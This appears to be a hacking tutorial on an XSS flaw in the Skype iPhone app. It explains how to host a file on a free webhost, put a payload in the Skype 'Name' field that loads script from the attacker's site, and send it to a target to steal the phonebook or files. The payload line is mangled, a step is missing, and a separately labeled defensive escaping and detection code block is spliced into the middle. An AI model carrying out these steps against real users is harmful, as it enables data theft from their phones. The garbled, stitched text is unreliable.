Easy Skype iPhone Exploit Exposes Your Phone Book & More

Like the recent XSS 0day found in the Mac and Windows versions of Skype, a similar one has been found in the Skype app for iPhone. The vulnerability allows an attacker to send a message that contains malicious JavaScript code in the "Name" parameter. This code can steal your phonebook, crash the app, and potentially do a lot worse. The URI scheme is improperly set for the WebKit view: instead of loading a blank page, it defaults to "file://", so the code could steal any file on your phone that Skype can access. We can all see why this disaster-of-a-0day would want to be avoided, right?

In this Null Byte, I'm going to show you how the exploit works, and what you can do to prevent it!

Warning

Only perform this on yourself, or users who give you their explicit permission.

Upload the file to a free webhost of your choice - I recommend T35 Hosting.

Step 2: Crafting Your XSS Message

Open Skype on your computer.

Open up your settings and edit your "Name" parameter.

Enter the following as the "Name" contents:

">yoursite.t35.com">

Select a target that is on Skype and send them a message.

When your target receives the message, Skype will execute the XSS attack, calling the commands contained inside your remote web page. Dangerous. Below is what the test may look like.
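The root of this bug is an untrusted display name being dropped into a WebKit view as raw HTML. As an added example (not code from this article or from Skype), here is how a chat client should handle that field instead: escape it before it touches markup, and flag names that carry markup characters so they can be logged. The functions, the sample messages and the `javascript:`/`on*=` heuristic are all constructed for this illustration.

```javascript
// Added example (not code from the article or from Skype): a defensive
// chat renderer. The iPhone bug described above comes from dropping a
// sender's "Name" field into a WebKit view as raw HTML. Here every
// untrusted field is escaped before it reaches markup, and names that
// still carry markup characters are flagged so a client can log them.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that let text break out of an HTML text node
// or a double/single-quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Heuristic for detection/logging only (constructed, not from the article):
// a human display name has no business containing angle brackets, double
// quotes, a javascript: URL or an on*= event handler. Apostrophes are left
// alone because names like O'Neil are legitimate; escapeHtml still handles them.
function looksLikeMarkup(name) {
  return /[<>"]|javascript:|\bon\w+\s*=/i.test(String(name));
}

// Build the message row the way a chat view might, but with the name and
// body escaped. Returns the markup plus a flag so the caller can both
// render and alert.
function renderMessage(msg) {
  const name = escapeHtml(msg.name);
  const body = escapeHtml(msg.body);
  return {
    html: `<div class="msg"><span class="from">${name}</span>: <span class="body">${body}</span></div>`,
    suspicious: looksLikeMarkup(msg.name),
  };
}

// Constructed sample messages: a benign one and one whose "Name" field
// is a markup-breaking string of the kind the article describes.
const SAMPLE_MESSAGES = [
  { name: 'Alice', body: 'hi there' },
  { name: 'Bob"><script>x()</script>', body: 'hello' },
];

// Render every message; none of the returned rows may contain a live tag.
function renderAll(messages = SAMPLE_MESSAGES) {
  return messages.map(renderMessage);
}

for (const row of renderAll()) {
  console.log(row.suspicious ? '[FLAGGED]' : '[ok]', row.html);
}
```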

Is There a Way to Protect Myself from This Attack?

The short answer is, no.

The only way an iPhone Skype user can protect themselves is to simply not use the app until this is patched. You could block everyone who is not on your contacts list, but you have to trust the friends you do have to not try this on you.

Skype claims that they will have this patched in the next release. From experience, I'm going to say that it probably won't happen soon. The last exploit like this led to days upon days of non-stop alert flooding to all of my Skype contacts. ;)